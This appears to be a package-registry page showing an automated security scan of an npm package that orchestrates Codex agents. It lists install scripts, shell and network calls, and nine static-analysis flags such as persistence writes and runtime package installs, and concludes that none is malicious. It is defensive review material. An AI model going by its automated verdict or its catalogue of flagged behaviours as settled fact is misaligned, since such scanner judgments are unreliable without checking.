AI Security Review
scanned 3d ago · by lpm-firewall-aiNo confirmed malicious attack surface was established by source inspection. The package has broad Codex orchestration capabilities, but the risky file writes, shell commands, and network calls are user-invoked or package-aligned rather than hidden install/import behavior.
Decision evidence
public snapshot- package.json defines postinstall and prepare lifecycle scripts.
- dist/scripts/postinstall.js runs on global npm installs and writes $CODEX_HOME/.omx/install-state.json.
- dist/cli/setup.js can write Codex config, hooks, skills, prompts, native agents, and AGENTS.md when user runs omx setup.
- dist/autoresearch/runtime.js runs git and a user-supplied evaluator command with shell:true during autoresearch workflows.
- dist/mcp/code-intel-server.js invokes npx/grep/ast-grep for user-requested code intelligence tools.
- dist/notifications/notifier.js can POST to user-configured Discord webhooks or Telegram API for notifications.
- Postinstall is gated to global installs and only records an install/version stamp plus a setup reminder; no network or command execution found there.
- Main import dist/index.js only re-exports library APIs and has no import-time side effects beyond module loading.
- CLI entrypoint dispatches user-invoked omx commands; setup/config/AGENTS mutations are aligned with the package purpose and exposed in help text.
- Network endpoints found are npm registry update checks, user-configured notification endpoints, GitHub release tooling, or live smoke tests requiring explicit env/script invocation.
- No evidence of credential harvesting, hidden exfiltration, persistence outside OMX/Codex-managed files, or unconsented lifecycle AI-agent control-surface mutation.
Source & flagged code
9 flagged · loading sourceInstall-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkgPackage defines install-time lifecycle scripts.
package.jsonView on unpkgPackage source references child process execution.
dist/autoresearch/runtime.jsView on unpkg · L1Package source references dynamic require/import behavior.
dist/cli/hooks.jsView on unpkg · L40This package version adds a dangerous source file absent from the previous stored version.
dist/cli/index.jsView on unpkgSource writes installer persistence such as shell profile or service configuration.
dist/cli/index.jsView on unpkg · L4Package source invokes a package manager install command at runtime.
dist/mcp/code-intel-server.jsView on unpkg · L546Package ships non-JavaScript build or shell helper files.
src/scripts/run-autoresearch-showcase.shView on unpkg